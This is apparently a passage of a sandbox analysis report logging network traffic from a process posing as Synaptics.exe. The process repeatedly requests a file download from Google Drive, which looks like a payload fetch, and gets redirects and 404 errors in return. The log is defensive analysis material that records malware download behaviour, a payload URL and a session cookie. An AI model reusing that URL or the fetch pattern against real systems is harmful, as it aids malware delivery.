                                                                                                                    2024-12-30 10:25:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 52 77 48 39 76 6a 41 47 6b 57 50 65 4b 6a 4b 37 49 61 68 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="vRwH9vjAGkWPeKjK7IahaQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    70192.168.2.949833142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-VEKuC3aGAMiuEyAMUNbOzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    71192.168.2.949834142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-V-4xVwjuM6-6uZldyXsFCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    72192.168.2.949835142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:47 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:48 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4NPnyuPuo627mGVkIHYHNTODlFAUEb9a1x0vu809gsNT5rPkTzvPWJH-n9S1RBkg4RP9lO9ok
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:47 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7x1LYiQYv-1TRgfMwOCTQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:48 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:48 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 39 64 71 4d 64 58 75 31 62 69 47 72 6c 68 4b 56 73 67 45 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="j9dqMdXu1biGrlhKVsgEOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:48 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    73192.168.2.949838142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:47 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:48 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7KLFUzBUDqk6-iriMtdDwqt4tTqbTHSgwjmSN9hg3M_6a2Bpjxw78Yjwoe2JQecEJa
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_AvqLEvdlrtumAnwbtXgcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:48 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:48 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 71 36 64 37 51 45 2d 34 6e 38 48 64 36 6b 55 66 44 34 46 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="cq6d7QE-4n8Hd6kUfD4FaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:48 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    74192.168.2.949839142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Pv6w9TWMZmzQz0vKBIEQTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    75192.168.2.949840142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:48 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-szXIE2C91GkqtX8O5zClnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    76192.168.2.949841142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:49 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7hUXUoJxNf5JNQ-4WeN5jArb5BtSJwve_aYd7OmhZ7VX_h6lVNyKlmiXdDwPZfpyaG
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z4uXlXGUD4Pg68MgaPc0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:49 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
